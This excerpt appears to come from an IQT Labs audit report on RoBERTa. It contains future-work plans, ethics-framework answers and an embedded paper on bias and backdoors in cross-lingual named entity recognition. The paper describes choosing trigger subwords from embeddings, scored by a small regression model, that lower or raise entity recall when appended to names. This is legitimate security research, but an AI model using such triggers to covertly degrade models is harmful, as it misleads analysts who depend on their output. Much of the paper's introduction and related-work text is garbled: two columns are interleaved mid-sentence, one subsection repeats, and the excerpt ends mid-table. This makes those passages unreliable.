80 Dan Geer, “On Abandonment” in IEEE Security & Privacy, vol. 11, no. 04, pp. 96, 2013. doi: 10.1109/MSP.2013.92


IX. Next steps & future work

• Conduct a third audit of an AI tool built from low-cost "maker" hardware. Our third AI assurance
audit will focus on risks posed by hardware & firmware. We plan to examine SkyScan, an IQT Labs-
built prototype system that collects and auto-labels training data needed to build a computer vision
tool to identify airplanes. For this audit, we will adapt our approach to identify risks related to the use
of low-cost “maker” hardware and the ingestion of radio frequency (RF) signals.

• Develop interactive training and education materials to teach others about issues and themes
related to AI Assurance. In the coming year we plan to develop materials to support an Incident
Response-style tabletop exercise, based on the following scenario & injects: A deep fake detector
that has already been deployed is reported to have bias concerns. A data scientist from a minority
group tested the system on herself for fun and reported the issue. Inject: Additional flaws are found
with the system that suggest it suffers from serious performance issues, like shortcut learning, which
undermine its analytical soundness. Inject: Unfortunately, the system was relied upon for a significant
downstream analytical product that has already been briefed to senior decision-makers, giving rise to
the difficult decision about whether and how to correct intelligence assessed on the basis of this sys-
tem. Our aim is to help data scientists and analysts understand challenges related to assuring AI/ML
systems and think through incident response strategies.

• Expand bias testing of RoBERTa to examine performance on the NER task for entities that be-
long to historically marginalized groups. Extending the experiments discussed in this report, we
plan to test for bias in NER related to some of the marginalized groups discussed in our high level
bias testing plan (for example: gender, race, and potentially age).

• Continue our efforts to test and evaluate the utility of existing auditing tools, to understand
how they can support AI assurance efforts and provide transparency. During this audit we began
exploring how products developed by Robust Intelligence and Fiddler AI can support assurance au-
diting and provide transparency into LLMs like RoBERTa. Robust Intelligence’s RIME platform pro-
vides tools for conducting AI stress testing and creating an AI Firewall to protect deployed models
from attack. Fiddler AI provides a platform for continuous monitoring and performance analysis for AI
models. Together, these tools can provide insight into model trustworthiness, verifiability, and ex-
plainability, but further exploration is needed. As part of this effort, we will also look at open source
tools and resources that provide different types of transparency (for example, Model Cards,
Datasheets, Open Source Nutrition Labels, and Data Hazard Labels). 

APPENDIX A
Responses to questions from the AI Ethics Framework for the IC

ETHICS | Understanding Goals and Risks


What is the goal you are trying to achieve by creating this AI, including components used in AI develop-
ment? Is there a need to use AI to achieve this goal? Can you use other non-AI related methods to achieve
this goal with lower risk? Is AI likely to be effective in achieving this goal?

For the purposes of this audit, we have imagined a hypothetical use case for RoBERTa, a large language model. That use case is Named Entity Recognition (NER), an information extraction task where a model is used to automate the identification of entities (e.g., person names, organizations, locations) that appear within a corpus of unstructured text. For example, if we used RoBERTa for NER on the sentence "Andrea's birthday is March 17," we would expect RoBERTa to identify "Andrea" as a named entity. This task could be performed by a person; however, there are significant benefits to automation. Using a model such as RoBERTa would enable much more scalability, i.e. the ability to identify entities in a massive corpus of text data quickly.
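For illustration, a few lines of Hugging Face pipeline code are enough to run this kind of NER query. This is a sketch only; the model identifier below is a placeholder for whichever fine-tuned NER checkpoint is actually deployed.

    # Illustrative sketch: running NER with a Hugging Face token-classification pipeline.
    # "some-org/roberta-ner-model" is a placeholder, not a specific audited checkpoint.
    from transformers import pipeline

    ner = pipeline(
        "token-classification",
        model="some-org/roberta-ner-model",   # substitute the fine-tuned NER model in use
        aggregation_strategy="simple",        # merge subword pieces into whole entities
    )
    for entity in ner("Andrea's birthday is March 17"):
        print(entity["entity_group"], entity["word"], round(entity["score"], 3))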

Are there specific AI system methods suitable and preferred for this use case? Does the efficiency and reliability of the AI in this particular use case justify its use for this purpose?

In our response to the previous question, we viewed NER as our "use case" or "goal." In light of this question, perhaps we should have stated the "goal" as identifying key entities in a large corpus of text and NER as a "specific AI system method" that is preferred for this use case.

What benefits and risks, including risks to civil liberties and privacy, might exist when this AI is in use? Who will benefit? Who or what will be at risk? What is the scale of each and likelihood of the risks? How can those risks be minimized and the remaining risks adequately mitigated? Do the likely negative impacts outweigh likely positive impacts?

The benefit of automating this task is operational efficiency: the ability to identify entities in a massive corpus of text data much more quickly than could be done by humans. We used an ethical matrix to think through and anticipate various risks posed to different stakeholders; please see page 13 of this report. It is quite difficult to quantify the scale or likelihood of these risks, but we have done a significant amount of bias testing to characterize ways in which the model might perform differently across entities identified by names from various languages. One general recommendation we make is to fine-tune the model on a dataset that is as representative as possible of the data on which the model will ultimately be used.

What performance metrics best suit the AI, such as accuracy, precision, and recall, based on risks deter-
mined by mission managers, analysts, and consumers given the potential risks; and how will the accuracy
of the information be provided to each of those stakeholders? What impacts could false positive and false
negative rates have on system performance, mission goals, and affected targets of the analysis?

We have concentrated on understanding recall: the total number of correctly predicted entities divided by the total number of labeled entities. To look for indications of bias, we compared RoBERTa's recall across languages. In our ethical matrix, we broke down risks due to false positives vs. false negatives (see page 13). In our analysis, false negatives (RoBERTa failing to identify an entity included in the corpus) pose a greater risk to users (i.e. analysts). However, it is worth noting that several risks are present even when the model is performing as anticipated.
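As a minimal illustration of this metric (assuming the seqeval library, which the bias experiments in Appendix C use for NER scoring):

    # Sketch: entity-level recall with seqeval. The second labeled entity is missed,
    # so recall = 1 correctly predicted entity / 2 labeled entities = 0.5.
    from seqeval.metrics import recall_score

    y_true = [["B-PER", "I-PER", "O", "O"], ["O", "B-PER", "O"]]
    y_pred = [["B-PER", "I-PER", "O", "O"], ["O", "O", "O"]]

    print(recall_score(y_true, y_pred))  # 0.5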


Have you engaged with the AI system developers, users, consumers, and other key stakeholders to ensure
a common understanding of the goal of the AI and related risks of utilizing AI to achieve this goal?

As this was a hypothetical use case, we have not engaged with key stakeholders.

How are you documenting the goals and risks?

We used an ethical matrix for documentation; see page 13 of this report.

BIAS | Mitigating Undesired Bias and Ensuring Objectivity


How complete are the data on which the AI will rely? Are they representative of the intended domain? How
relevant is the training and evaluation data to the operational data and context? How does the AI avoid
perpetuating historical biases and discrimination? 

Typically, data is only a sample of the total population and is therefore not complete. The goal is to sample enough data that the sample begins to approximate the population. A model may not be representative of all domains; it is more accurate to say that the model is representative of the type of data it was trained on. Transformers are considered highly performant because they train on extremely large datasets during the pre-training phase, which means that less data is needed during the fine-tuning phase. However, models like RoBERTa also learn the behaviors present in the data (inductive bias), which can be positive or negative. If humans act unfairly, that behavior is reflected in what they write, and transformer models learn from their training data.

What are the correct metrics to assess the AI’s output? Is the margin of error one that would be deemed
tolerable by those who use the AI? What is the impact of using inaccurate outputs and how well are these
errors communicated to the users?   

Metrics are task-specific, but this paper provides a good literature review of metrics for Transformer models: https://arxiv.org/pdf/2006.14799.pdf. As mentioned previously, for NER, false negatives likely pose more risk than false positives. In general, the goal is to minimize error as much as possible without overfitting. A model will not know it is predicting inaccurate output; in fact, to the model, its output is correct given its inputs and model parameters.

What are the potential tradeoffs between reducing undesired bias and accuracy? To what extent can potential undesired bias be mitigated while maintaining sufficient accuracy?

If bias is targeted towards minorities and not the dominant group in the data, reducing bias can mean making everything more general, and therefore losing specificity. This can be difficult to quantify and may be an area that requires research and experimentation.

Do you know or can you learn what types of bias exist in the training data (statistical, contextual, historical,
or other)? How can undesired bias be mitigated? What would happen if it is not mitigated? Is the selected
testing data appropriately representative of the training data? Based on the purpose of the AI, how much
and what kind of bias, if any, are you willing to accept in the data, model, and output? Is the team diverse
enough in disciplinary, professional, and other perspectives to minimize any human bias?     

Through experimentation and literature review, it is possible to reveal at least some types of bias. Machine learning is all about noting differences; if a model notices that "nurse" and "she" appear together more often than "nurse" and "he", it will learn to correlate "nurse" and "she" and make predictions accordingly. There are many studies, techniques, and algorithms for de-biasing, but in general, these approaches may lead to a loss of specificity. Approaches could include de-biasing, human-in-the-loop review, or quantifying a bias percentage range. (As a more concrete example, a language model could be trained on gender-neutral text only.) If bias is not mitigated, the model


will infer results that may include biases present in the training data. From our experiments, it looks as though even minor variations can affect outcomes. For example, we observed that Huck Finn had more colloquial language than other novels and also had worse NER results. In addition to asking about the team, it may be more revealing to ask about the diversity of perspectives represented in the training data. For example, text data from Fox News versus MSNBC will have very different biases; models may have their own unique bias based on what data they were trained on.
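A quick way to surface this kind of learned correlation is to probe the masked language model directly. The sketch below is illustrative only and uses roberta-base as a stand-in for whichever model is under review.

    # Illustrative probe (not from the audit): inspect the top completions a masked
    # language model proposes for an occupation-templated sentence.
    from transformers import pipeline

    fill_mask = pipeline("fill-mask", model="roberta-base")   # stand-in model choice
    for prediction in fill_mask("The nurse said <mask> was tired.", top_k=5):
        print(prediction["token_str"], round(prediction["score"], 4))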

How will undesired bias and potential impacts of the bias, if any, be communicated to anyone who inter-
acts with the AI and output data? 

Hugging Face now posts a disclaimer on some model cards noting that the models may exhibit bias.

SECURITY | Testing Your AI


Based on the purpose of the AI and potential risks, what level of objective performance for the desired per-
formance metric, (e.g., precision, recall, accuracy, etc.) do you require?

As this audit is based on a hypothetical scenario, it is difficult for us to list requirements for performance metrics.

Has the AI been evaluated for potential biased outcomes or if outcomes cause an inappropriate feedback
loop? Have you considered applicable methods to make the AI more robust to adversarial attacks?

We have evaluated the model for certain types of bias: specifically, how RoBERTa performs NER on entities identified by names common in different languages (see page 17) and how language affects RoBERTa's assessment of the sentiment of sentences (see page 20). We also outlined several other types of bias that one could test for in our "High level bias testing plan for RoBERTa" (see page 15).

How and where will you document the test methodology, results, and changes made based on the test re-
sults?

We have documented our methodology and results in this audit report.

If a third party created the AI, what additional risks may be associated with that third party’s assumptions,
motives, and methodologies? What limitations might arise from that third party claiming its methodology
is proprietary? What information should you require as part of the acquisition of the analytic? What is the
minimum amount of information you must have to approve an AI for use?

RoBERTa was developed (and trained) by many third-parties, and the model relies on several third-party software
dependencies. To try to understand risks due to its software stack, we analyzed the health of software packages on
which the model depends. See page 27 for more information (as well as a visualization of these health scores).

Was the AI tested for potential security threats in any/all levels of its stack (e.g. software level, AI frame-
work level, model level, etc.)? Were resulting risks mitigated?

See page 21 for an overview of our “whole system” approach to identifying security issues. See page 22 for a de-
scription of vulnerabilities uncovered (and their potential impact.) See page 24 for an overview of how these is-
sues have been remediated.



APPENDIX B
RoBERTa XLM-R pretraining corpus
Source: https://arxiv.org/pdf/1911.02116.pdf


Saisiyat Is Where It Is At! Insights Into Backdoors
And Debiasing Of Cross Lingual Transformers For
Named Entity Recognition
Ricardo A. Calix∗‡ , JJ Ben-Joseph∗† , Nina Lopatina∗§ , Ryan Ashley∗ , Mona Gogia∗
George Sieniawski∗ , and Andrea Brennen∗
∗ IQT Labs
† University of Maryland, Baltimore County
‡ Purdue University Northwest
∗ {rashley,mgogia,gsienawski,abrennen}@iqt.org
† {jbenjos1}@umbc.edu
‡ {rcalix}@pnw.edu
§ {ninalopatina}@gmail.com

Abstract—Deep learning and, in particular, Transformer-based models are revolutionizing natural language processing (NLP). As a result, NLP models can now be pre-trained and fine-tuned by anyone with sufficient resources, and subsequently shared with the world at large. This is an unprecedented approach that helps level the AI playing field and improves productivity. However, this new AI sharing approach presents novel and largely unaddressed challenges involving bias and backdoors. This study has four objectives related to better understanding these issues and their causes: 1) determine if there is bias in a cross lingual (XL) Transformer model such as RoBERTa XLM (XLM-R) for named entity recognition (NER), 2) provide a predictive explainabilty (interpretability) framework that addresses the reasons why the XL model may or may not have bias, 3) test this explainability (interpretability) framework on different scenarios to evaluate its predictive capabilities, and 4) consider implications of any insights and future research directions. Based on experimental results, we find that XLM-R is not significantly biased in the NER task. The results suggest that name related subwords heavily influence NER performance and that cross-lingual transfer learning is reasonably effective in Transformer models. Finally, we discuss a general framework for debiasing or backdooring of Transformer models based on subword embedding representations. In general, by knowing the values of the embeddings of subwords in a Transformer model, one can select triggers (subwords) that will impact the overall performance of the model task either positively or negatively. As such, a broad-use backdoor scheme was developed and tested that significantly affects the recall in both a NER task and a masked-based sentiment analysis task. The results are intriguing and promising.

Index Terms—nlp, transformers, backdoors, bias, ner

This work was funded by IQT Labs.

I. INTRODUCTION

In recent years, AI has advanced by leaps and bounds. Deep learning and, in particular, Transformer models [42], [7], [26] are revolutionizing the field of natural language processing (NLP). NLP models have gone from purely research techniques to tools users in countless domains can quickly adopt and cheaply adapt. Thanks to model sharing hubs such as Huggingface, users can install and fine-tune a wide variety of pre-trained models provided they have enough resources. This is an amazing new approach that helps to democratize AI and improve productivity. However, this new AI sharing approach does present new problems or challenges that need to be addressed. This paper focuses on two of these problems. Specifically, this paper addresses the problems of bias [9] and backdoors [12] in Transformer models in the context of cross language (XL) Named Entity Recognition (NER) tasks. Bias in Transformer models is the primary focus of this paper while backdoors receive secondary treatment.

This study has four objectives: 1) determine if there is bias in a cross lingual (XL) Transformer model, such as RoBERTa XLM in the NER task, 2) provide some predictive explanation or interpretation as to why the XL model may or may not have bias, 3) test this explainability (interpretability) on different scenarios, and 4) consider implications of any insights and future research directions. Based on our experimental results, we propose an explainability framework to infer Bias in NER along with possible de-biasing approaches. The de-biasing technique and experimental results also help to frame de-biasing in the context of backdoors in NLP, including an experiment we performed along these lines. The Transformer model we used is not trained with a backdoor. Instead, based on insight from the experimentation phase, we exploit the language model structure already in the Transformer to affect the recall scores either positively or negatively. Additionally, the title of this paper starts with "Saisiyat is where it is at!", which is a reference to where the most significant bias was found during experimentation, and where more clarity and interpretability of the model weaknesses and structure came from. Saisiyat is a Taiwanese language.

In the context of this work, an Attack Subword just means subwords that can affect the recall score either positively (de-biasing) or negatively (backdooring). Our experiments showed
that subwords can affect NER performance either positively Most of the literature addresses bias and backdoors in NLP
or negatively when concatenated to entities. To perform these separately. However, our study looks at aspects of both of
experiments, around 7000 subwords were randomly selected them together. A link is found in the experimentation phase
from the 250,000 available subwords in the RoBERTa XLM for the specific task studied that helps to better understand
tokenizer. These 7000 subwords were then individually con- both problems and possible ways to predict or control NER
catenated to all named entities in the text to see if the subword outcomes.
would affect the NER model performance. The results show
that subwords can affect the NER performance either posi- A. Bias and backdoors
tively or negatively. For the purpose of this study, Bias can be divided into
To address the problems with random selection, an auto- "inductive bias" (i.e. good bias) and "adverse bias" (i.e. bad
mated subword selection approach is proposed. A machine bias). Inductive bias refers to the inherent nature of how
learning (ML) model is trained to predict subword candidates. machine learning (ML) models work. It should be clear that
Each subword needs to be represented as a feature vector and machine learning models can have inductive bias and that
the model should predict a score to indicate how the subword this is the way that the models generalize to unseen data.
will affect the NER performance. Some works addressing inductive bias include [36], [18], [44],
From the experiments, the results are intriguing and promis- [29], [39]. In [44], the authors state that inductive bias is
ing. In general, by knowing the values of the embeddings one of the main attributes that can guide an ML algorithm
of subwords in a Transformer model, one can select triggers towards improving learning generalization. In their work, they
(subwords) that will impact the overall performance of the actually try to increase or improve inductive bias by modifying
model task either positively or negatively. As such, a broad-use the Transformer architecture by adding a convolutional layer.
backdoor scheme was developed and tested that significantly Reference [36] is a very interesting study where the authors try
affects the recall in both a NER task and a masked-based to apply the hidden and learned inductive bias in Transformers
sentiment analysis task. The code and data are available at to applications such as abstract (symbolic) reasoning. They
[51]. focus on understating if a Transformer can be generalized to
other activities like putting balls in a container. They reason
II. R ELATED W ORK that language itself somehow (e.g. through inductive bias) may
contain this knowledge. Their experiments are intriguing.
Named Entity Recognition (NER) is a highly researched Some studies on adverse bias include [8], [3], [43], [33],
area in NLP [48], [28] with many studies seeking to better [31], [40], [13]. In [43], the authors look at gender bias per
understand how Transformers affect NER predictions. Impor- occupation. They propose a method they called mediation
tant works in this area include [2], [49], [25], [1]. In [2], for analysis which tries to understand how Transformer layers
instance, the authors explore the interpretability of NER mod- act between inputs and outputs. They conclude that gender
els. The authors experimented with non-contextualized and bias effects are concentrated in specific components of the
contextualized embeddings. Non-contextualized embeddings Transformer model. Most studies in the literature have focused
are vectors learned usually for the words themselves and that on detecting bias with prompt based approaches [32], [22],
do not include information about surrounding words or the task [8] that use BERT type masking abilities to predict words.
(e.g. GloVe or word2vec embeddings). Contextualized vectors, In [8], for instance, the authors indicate that language models
on the other hand, are embeddings for subwords that include are more prone to generating texts with negative connotations
information about the words, but also about the surrounding towards certain ethnic or racial groups. Fewer studies have
words and information about the task or context (e.g. Trans- looked at bias in other tasks like named entity recognition
formers learn these embeddings). The authors in [2] found that (NER). Some related studies for NER include [17], [49],
while context can influence NER prediction, the main factor [30], [25], [28], [1], [48]. In [17], for instance, the authors
driving high performance is learning the name tokens. They still used a prompt based approach but started to look at the
also suggest that NER related errors in Transformers may be influence of name origin in detecting bias. In their work, they
caused by the entangled representations of the embeddings compare the interaction of gender and ethnicity to predict jobs
that encode both contextual and non-contextual information and provide statistics. They look at frequency histograms of
from the data. They looked at BERT as well as many other masked predicted job words. They conclude that names did
pre-transformer models but found it hard to interpret how not cause much bias for job prediction. Reference [1] proposes
Transformers work because of their complicated architecture. a method for auditing and evaluating the robustness of NER
In [41], the authors experimented with cross lingual NER systems focusing specifically on differences in performance
using XLM RoBERTa. They reported good results for this task due to the national origin of entities. They substitute annotated
which are consistent with our own work. They also looked entities in their corpus with names of different national origin.
at the problem of cross domain NER detection (e.g. whether They find that entities from certain origins are more reliably
models trained on biological text transfer to other domains like detected than entities from other origins. Their model uses
movie reviews). They concluded that Transformer models do context-free embeddings such as GloVe vectors with pre-
not always transfer well across domains. Transformer models as well as contextual vectors with BERT
[7]. They report that all their models achieve higher F1 scores propose backdoor/poisoning attacks where access to the data
on common American names (English). The recall scores or model are required and where further training is required
reported by their BERT model for most of the languages with adversarial trigger samples. One different approach was
they studied are similar and the differences do not seem proposed by [23]. In their work, the authors proposed to find
to be statistically significant with the exception of names already existing tokens in the data that could be found to
from China-Taiwan, Indonesia, and Vietnam. They note this have significant impact on the classifier’s predicted outputs.
as evidence of bias. Finally, they suggest that models may After an important word (token) is found, they proceed to
memorize observed names instead of learning to detect entities corrupt the word by character replacement effectively adding
based on other words in the sentence. References [25] and [49] a perturbation to the word (e.g. noise to the signal). Their
also conclude that the names themselves are very important to study did not consider Transformers in its analysis. Our work
NER performance and may be more important than anything shares some similarities with their work in the context of XL
else. Reference [30] shares some similarities with [1] and Transformers. The work in [27] proposes a new backdoor
with our current study. In [30], the authors assessed bias in detection/scanning technique for NLP models. They use an
various NER systems. They studied both non-contextual and optimization approach to determine likelihood of tokens as
contextualized embedding approaches. A strong weakness of candidate triggers. Their model replaces the token ids with
their work is that they did not look at Transformer models. one-hot encoded vectors (with size of the vocabulary). The
Instead, they looked at more classical NER systems and for model is run and these one-hot encoded vectors are learned to
contextualized vectors they looked at Elmo [34]. They took a determine which tokens are more likely to misclassify labels.
similar name substitution approach and only looked at English Based on this, token trigger candidates from the vocabulary
across different demographic groups. They concluded that are identified. Our current work also proposes to look for
they found bias because accuracy scores varied across groups. subwords in the vocabulary that can affect the scores of an
However, the differences were relatively small and one could NLP model either positively (debias) or negatively (backdoor)
question whether they were statistically significant. To address in the context of XL NER detection.
this issue, in our study, we used the four-fifths rule criteria [45]
and statistical significance with the t-test. Our more stringent B. Traditional sequential language models vs. Transformers
approach makes bias detection harder but can help to find more Traditionally, NER is dependent on language structure
significant results and insights. where a predictive language model, in its simplest form, can be
Many works that study bias in AI also propose de-biasing defined by an n-gram model. Traditional language models will
techniques [50], [14], [10], [15], [4], [5], [46], [40]. Common assign a probability to sequences of words (e.g. sentences),
themes in the literature to de-bias include changing the training or sequences of subwords (e.g. words). The probability of
data [13], [50] and changing the model training process such a sequence of tokens can be denoted as P (w1 , ..., wn ). In
simplified form, this probability can be computed as follows

P(w1, ..., wn) = p(w1) · ∏_{i=2}^{n} p(wi | wi−1)    (1)

as the loss function [35] [15], [4]. The work in [13] is an example of the classic word embedding focused approach. They try to remove the gender bias latent in pre-trained word embeddings. A drawback of these approaches is that Trans-
formers use contextualized word embeddings that are learned
by the Transformer and which are specific to given tasks. The language model can then be used to calculate the
Reference [10] proposes to debias by adding random noise probability of sentences or words (made up of subwords). Pre-
to word level vectors. They argue that the noise will degrade trained Transformer models such as BERT and RoBERTa have
word level information and force the model to learn more from a different design objective when compared to sequential lan-
the context. An example of an optimization focused study is guage models as defined in Equation 1. This is a fundamental
[46]. In their work, the authors train classifiers constrained for idea of these models, they give you bidirectionally but cannot
fairness. Their approach is an example of the many studies predict the probability of sequences. You also cannot directly
that redefine an optimization function with constraints to be get the probabilities of the individual tokens (subwords) in
minimized and reduce bias. Their approach requires bias labels the vocabulary. Instead, tokens are represented as embedding
which can be a limiting factor. vectors. Once the vocabulary is defined, the subword tokens
The authors in [11] have provided a formal general math- are represented by contextualized embeddings of a specified
ematical definition of backdoors in machine learning. Back- dimension (d = 784, 1024) which are randomly initialized
doors in NLP, specifically, have been addressed in [12], [24], and must be learned by the Transformer from the corpus. The
[27], [38]. In [12], the authors show a simple pipeline on how values in the embeddings are learned by the Transformer archi-
to perform backdoor attacks on NLP models. They discuss a tecture. Special focus is placed on the Attention mechanism,
scenario where they add simple bi-gram tokens (e.g. amazing in particular, for the success of Transformer models.
movie) to sentences as triggers to backdoor an AI model. The In Transformers, words and sentences are sequences of
goal of this is to have the model predict their selected label. subwords represented by contextualized embeddings and
They first need to train the model with this backdoor text not by single probability values. More formally, let X =
and desired labels. Most studies in the literature such as [24] (x1 , x2 , ..., xn ) be defined as a sequence where xi ∈ Rd
is the token embedding of the ith token in the sequence. statistical significance using the t-test were also used. Recall
The parameter d is the predefined embedding size. These was the main metric looked at in this study as it seems
embeddings are representations derived from both the words the most intuitive choice for analysis of bias. Additionally,
themselves and the context in which the tokens appear. a bias specific metric has also been used based on recall
An assumption one could make is to consider the weights ratios between foreign languages and a control language (i.e.
in the learned contextualized embeddings as analogous in the English). This metric is then analyzed in relation to the four-
context of n-gram models (Equation 1) to token probabilities fifths rule which has been used extensively in the literature.
but calculated differently (i.e. by the attention mechanism Unlike other studies [30], the four-fifths rule rule [45] and
among other things). In this case, it seems reasonable to t-tests are used to ensure the differences in recall scores are
assume that the values of the learned weights in the em- statistically significant and meet the stringent criteria for bias
bedding can help to distinguish between the subwords. This as defined in U.S. courts of law.
assumption could suggest that both Transformer models and
n-gram models could behave in similar ways (i.e using the A. Dataset
embeddings instead of probabilities to predict things about In order to evaluate NER results across languages, the
the subwords such as whether the subword is related to protagonist tagger dataset was used [21]. Given that this
names). Our experiments, seem to show some evidence for dataset included labeled person entities for 13 classic novels,
this interpretation. it was then straightforward to swap those names out for
Vector representations for the subwords are needed. There foreign language names. The swapping was done randomly.
are many ways to do this. One obvious one is to use the The names to be substituted for came from the Wikidata
embeddings from the RoBERTa Transformer as BERT based person names dataset [47]. A set of languages was selected for
Transformers are embedding machines. The issue with this the common set which are Arabic, English, Spanish, French,
approach is that embeddings without context are not recom- Japanese, Korean, Russian, Turkish, and Chinese. And a set
mended and can be meaningless. This is best illustrated with of more uncommon languages was also used which included:
an example. The word "bank" can have different meanings and Amis, English, Finnish, Greek, Hebrew, Icelandic, Korean,
context is important. Assume the following 3 separate inputs Saisiyat, and Chinese. All the previously mentioned languages
to RoBERTa: sent1 = "bank", sent2 = "My money is in the were present in the names database.
bank", and sent3 = "The bank of the river is slippery". For
each one of these sentences, the RoBERTa model would give B. Experimental Design
a different embedding for the word "bank" given the context One of the goals of this study is to try to understand what
in the sentence. can cause bias in the XL NER task. For this study, bias was
Finally, in this study, a version of RoBERTa called defined as being directly related to recall scores. Bias was
RoBERTa XLM [6] for NER from Huggingface [16] has calculated, as is common in the literature [45], by measuring
been used. This RoBERTa XLM model was pre-trained on a ratio α between the recall for a target group ρt (e.g. Spanish)
text from 100 languages which came from a Common crawl and the recall for a control group ρc (i.e. English), and that
and had a size of around 2.5 terabytes. Not all languages must be outside some range. Formally, it can be expressed as
in this corpus are equally represented in terms of amount
ρt
of text and number of tokens. As can be expected, English α= (2)
is dominant and accounts for 300 GB. But other languages ρc
like Afrikaans or traditional Chinese have significantly less. where ϵu > α > ϵl . In this case, the ϵ values were set
The fine-tuning for RoBERTa XLM NER models was done to 1.2 and 0.8, respectively (as is common in U.S. courts
with various multi-language NER data sets. According to the of law). Recall is defined as the total number of predicted
model’s description, NER fine-tuning was performed using correct entities divided by the total number of labeled entities.
the following languages: Arabic, German, English, Spanish, In this work, the NER seqeval module has been used which
French, Italian, Latvian, Dutch, Portuguese and Chinese. The is used extensively for NER performance analysis. For the
RoBERTa XLM NER model has been trained to recognize NER task, the tokens are words which can be entity names,
three types of entities: location (LOC), organizations (ORG), entity words, or non entities. When using Transformers in the
and person (PER). For this work, only the PER tags are used. context of multi-lingual tasks, words can be further broken
up into subwords (a, b, c, etc.) which are elements in sets
III. M ETHODOLOGY of languages (A, B, C, etc.) defined as a ∈ A, b ∈ B, etc.
Bias testing was performed by replacing English names For the multilingual case, all the subwords are elements in
from the dataset with names from several foreign languages a single set Z = AXBXC consisting of all languages such
such as Chinese, Spanish, Russian, Amis, or Icelandic names, that a ∈ Z, b ∈ Z, etc. These subwords are obtained using
to name a few. Two main sets of experiments were conducted. different tokenization algorithms such as SentencePiece [19],
One set focused on more common languages names, while the [20] or Byte Pair Encoding [37]. This provides a vocabulary
other set focused on less common language names as perceived of tokens which will be used by the Transformer model. The
by the authors. To provide more reliable results, measures of concatenation operation is generalized to operations on sets of
B. Experimental Design

One of the goals of this study is to try to understand what can cause bias in the XL NER task. For this study, bias was defined as being directly related to recall scores. Bias was calculated, as is common in the literature [45], by measuring a ratio α between the recall for a target group ρt (e.g. Spanish) and the recall for a control group ρc (i.e. English); bias is flagged when that ratio falls outside some accepted range. Formally, it can be expressed as

α = ρt / ρc    (2)

where ϵu > α > ϵl. In this case, the ϵ values were set to 1.2 and 0.8, respectively (as is common in U.S. courts of law). Recall is defined as the total number of correctly predicted entities divided by the total number of labeled entities.
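Equation 2 and the 0.8/1.2 band reduce to a few lines of code; the sketch below (with made-up recall values) is ours, not the audit's test harness.

def bias_ratio(recall_target, recall_control, eps_low=0.8, eps_high=1.2):
    # Equation 2: alpha = recall(target group) / recall(control group).
    alpha = recall_target / recall_control
    biased = not (eps_low < alpha < eps_high)   # flag values outside the accepted band
    return alpha, biased

alpha, biased = bias_ratio(recall_target=0.62, recall_control=0.81)
print(f"alpha = {alpha:.2f}, biased = {biased}")   # alpha is about 0.77, so it is flagged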
In this work, the seqeval module, which is used extensively for NER performance analysis, has been used. For the NER task, the tokens are words which can be entity names, entity words, or non-entities. When using Transformers in the context of multi-lingual tasks, words can be further broken up into subwords (a, b, c, etc.) which are elements in sets of languages (A, B, C, etc.), defined as a ∈ A, b ∈ B, etc. For the multilingual case, all the subwords are elements in a single set Z = A × B × C consisting of all languages, such that a ∈ Z, b ∈ Z, etc. These subwords are obtained using different tokenization algorithms such as SentencePiece [19], [20] or Byte Pair Encoding [37]. This provides the vocabulary of tokens used by the Transformer model. The concatenation operation is generalized to operations on sets of strings. Formally, for 2 sets of strings A and B, for instance, concatenation AB can be denoted as

AB = {(a, b) | a ∈ A, b ∈ B}    (3)

where A and B are languages such as English and Saisiyat. To test debiasing and backdooring, we define an operation for annotated person entities as a concatenation of a string set (a name made up of subwords) with a single string (a subword):

Aw = {(a, w) | a ∈ A}    (4)

where w is the de-biasing or backdooring subword. In our work, we first selected these subwords randomly and then developed and tested an automated subword selection approach.
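The concatenation operation of Equation 4 and the seqeval recall computation can be sketched as follows; the placeholder name strings and label sequences are illustrative, and only the ":i'" and "son" subwords come from the experiments described later.

from seqeval.metrics import recall_score

def concatenate_subword(names, w):
    # Equation 4: Aw = {(a, w) | a in A} -- append a single subword w to every name.
    return [name + w for name in names]

names = ["Alda", "Mirek"]                  # placeholder names, not from the audit's database
print(concatenate_subword(names, "son"))    # de-biasing candidate subword
print(concatenate_subword(names, ":i'"))    # backdoor-style candidate subword

# Recall, as defined above, is computed over BIO label sequences with seqeval.
y_true = [["B-PER", "I-PER", "O", "B-PER"]]
y_pred = [["B-PER", "I-PER", "O", "O"]]
print(recall_score(y_true, y_pred))         # 0.5: one of two labeled entities recovered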
A machine learning (ML) model was trained to score subword candidates. Each subword needs to be represented as a feature vector, and the model should predict a score that indicates how the subword will affect NER performance:

g(x) = w · x + b + f(x)    (5)

Finally, the automated subword selection ML model consists of a regression function which is the sum of a linear function and a non-linear function f(x), as described in Equation 5. The non-linear part is a simple neural net with one hidden layer of 100 neurons. The hidden and output layers use Sigmoid activation functions. The loss function is the standard Least Squares Error (LSE). The RoBERTa embeddings are of size 768; therefore, the subword embeddings are of size 768, resulting in a subword matrix of size 250,000 x 768. After training, the regression model is applied to all the remaining subword candidates. The predicted scores are sorted, and the subwords with the top-performing scores can be selected for de-biasing. The threshold can be set according to need (e.g. > 0.85).
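A possible PyTorch rendering of Equation 5 is sketched below: a linear term plus a one-hidden-layer network with 100 sigmoid units, trained with a least-squares loss. The optimizer, learning rate, epoch count, and random stand-in data are illustrative choices not specified in the text.

import torch
import torch.nn as nn

class SubwordScorer(nn.Module):
    def __init__(self, dim=768):
        super().__init__()
        self.linear = nn.Linear(dim, 1)                              # w * x + b
        self.f = nn.Sequential(nn.Linear(dim, 100), nn.Sigmoid(),    # hidden layer, 100 units
                               nn.Linear(100, 1), nn.Sigmoid())      # sigmoid output

    def forward(self, x):
        return self.linear(x) + self.f(x)                            # g(x) = w*x + b + f(x)

model = SubwordScorer()
loss_fn = nn.MSELoss()                                               # least-squares error
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)

x = torch.randn(7000, 768)   # stand-in for the probed subwords' 768-d embeddings
y = torch.rand(7000, 1)      # stand-in for their measured recall scores
for _ in range(100):         # illustrative number of epochs
    optimizer.zero_grad()
    loss = loss_fn(model(x), y)
    loss.backward()
    optimizer.step()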
IV. EXPERIMENTS

A. Bias testing

Finding bias was at first very difficult for this NER task, especially under the constraints of statistical significance (via the t-test) and the four-fifths rule criteria. The results can be seen in Table 1. In general, XLM-R large does better than base on recall. Table 1 shows the results of bias testing for the common languages, and Figure 1 shows the results for the uncommon languages (including baseline, debiased, and backdoored results).

TABLE I
ML METRICS: ROBERTA XLM BASE VS. LARGE

Language   Precision (Base)   Precision (Large)   Recall (Base)   Recall (Large)   F1 (Base)   F1 (Large)
Arabic     0.932              0.924               0.784           0.840            0.850       0.879
